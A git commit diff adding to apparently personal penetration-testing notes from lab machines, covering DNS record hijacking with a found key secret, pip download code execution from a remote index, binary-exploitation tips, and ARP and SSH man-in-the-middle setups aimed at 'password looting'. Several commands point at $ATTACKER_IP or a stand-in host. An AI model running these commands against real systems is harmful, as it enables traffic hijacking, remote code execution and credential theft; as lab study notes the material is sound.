bump
This commit is contained in:
parent
840daf84da
commit
b0b36adea5
|
@ -23,3 +23,21 @@ send
|
||||||
quit
|
quit
|
||||||
```
|
```
|
||||||
* Check domain by querying the subdomain's A record via dig/drill/nslookup
|
* Check domain by querying the subdomain's A record via dig/drill/nslookup
|
||||||
|
|
||||||
|
### Found Secrets for Keys
|
||||||
|
|
||||||
|
If there is the possiblity of found secret for a key, for example in `/etc/bind/named.conf` then this secret can be used to join the domain.
|
||||||
|
```sh
|
||||||
|
nsupdate -d -y <hash algorithm>:<name of the key>:<secret>
|
||||||
|
Creating key...
|
||||||
|
namefromtext
|
||||||
|
keycreate
|
||||||
|
|
||||||
|
server <domain>
|
||||||
|
update add mail.snoopy.htb. 86400 IN A $ATTACKER_IP
|
||||||
|
send
|
||||||
|
```
|
||||||
|
|
||||||
|
Copy the lines, every space counts as it has to be exactly like in the example
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
# Tips & Tricks for Binary Exploitations
|
# Tips & Tricks for Binary Exploitations
|
||||||
|
|
||||||
# Toggle ASLR
|
## Toggle ASLR
|
||||||
|
|
||||||
State of ASLR can be switched via sysctl parameter `randomize_va_space`. [Kernel.org documentation](https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#randomize-va-space) displays the states of the switch.
|
State of ASLR can be switched via sysctl parameter `randomize_va_space`. [Kernel.org documentation](https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#randomize-va-space) displays the states of the switch.
|
||||||
|
|
||||||
|
@ -39,3 +39,10 @@ echo -e '\xde\xad\xc0\xde' | xxd
|
||||||
## NULL bytes in Adresses
|
## NULL bytes in Adresses
|
||||||
|
|
||||||
NULL bytes `\x00` in an address stop the execution of the payload input as a whole. An exception is `read()`, it does not stop on NULL bytes
|
NULL bytes `\x00` in an address stop the execution of the payload input as a whole. An exception is `read()`, it does not stop on NULL bytes
|
||||||
|
|
||||||
|
## Read from running process
|
||||||
|
|
||||||
|
Read from a running process' stdout by attaching to the process via strace and read in the following way
|
||||||
|
```sh
|
||||||
|
strace -e read -p <ProcessId>
|
||||||
|
```
|
||||||
|
|
|
@ -0,0 +1,12 @@
|
||||||
|
# PIP Exploits
|
||||||
|
|
||||||
|
## pip download
|
||||||
|
|
||||||
|
Python pip executes tar files after the download option has been triggered.
|
||||||
|
Therefore, a hand crafted python module needs to be created and build.
|
||||||
|
After that pip can be used in the following way
|
||||||
|
```sh
|
||||||
|
pip download totally_not_malicious --index-url http://example.com --trusted-host example.com -v
|
||||||
|
```
|
||||||
|
|
||||||
|
An in detail blog post has been done by [wunderwuzzi on embracethered.com](https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/)
|
|
@ -1,3 +1,10 @@
|
||||||
# SMTP
|
# SMTP
|
||||||
|
|
||||||
* [hacktrick's site](https://book.hacktricks.xyz/pentesting/pentesting-smtp)
|
* [hacktrick's site](https://book.hacktricks.xyz/pentesting/pentesting-smtp)
|
||||||
|
|
||||||
|
## Adhoc SMTP Server
|
||||||
|
|
||||||
|
Set up an SMTP Server quickly using `maildev`
|
||||||
|
```sh
|
||||||
|
sudo maildev -s 25 --ip $ATTACKER_IP
|
||||||
|
```
|
||||||
|
|
|
@ -1,5 +1,8 @@
|
||||||
# Man In the Middle
|
# Man In the Middle
|
||||||
|
|
||||||
|
|
||||||
|
## Ettercap
|
||||||
|
|
||||||
* [Ettercap](https://www.ettercap-project.org/)
|
* [Ettercap](https://www.ettercap-project.org/)
|
||||||
* [Bettercap](https://www.bettercap.org/)
|
* [Bettercap](https://www.bettercap.org/)
|
||||||
|
|
||||||
|
@ -19,6 +22,7 @@ if (ip.proto == TCP && tcp.dst == 80 && search(DATA.data, "filename.html") ) {
|
||||||
msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n");
|
msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n");
|
||||||
}
|
}
|
||||||
```
|
```
|
||||||
|
|
||||||
* Escape double quote inside the payload string
|
* Escape double quote inside the payload string
|
||||||
* compile via
|
* compile via
|
||||||
```sh
|
```sh
|
||||||
|
@ -29,3 +33,16 @@ etterfilter filter.ef -o filter.ef
|
||||||
```sh
|
```sh
|
||||||
ettercap -T -i <interface> -M arp -F filter.ef
|
ettercap -T -i <interface> -M arp -F filter.ef
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## mitm-server
|
||||||
|
|
||||||
|
Set up a local Man in the middle server which can be used for example for password looting if somebody logs in.
|
||||||
|
[SSH-MITM](https://docs.ssh-mitm.at/#) provides this feature. Therefore, download the package via `pip install ssh-mitm`.
|
||||||
|
|
||||||
|
Redirect the port to the mitm server and start it afterwards
|
||||||
|
|
||||||
|
```sh
|
||||||
|
((socat TCP4-LISTEN:2222 TCP4:10.10.14.4:10022 &) &)
|
||||||
|
|
||||||
|
ssh-mitm server --remote-host $TARGET_IP
|
||||||
|
```
|
||||||
|
|
Loading…
Reference in New Issue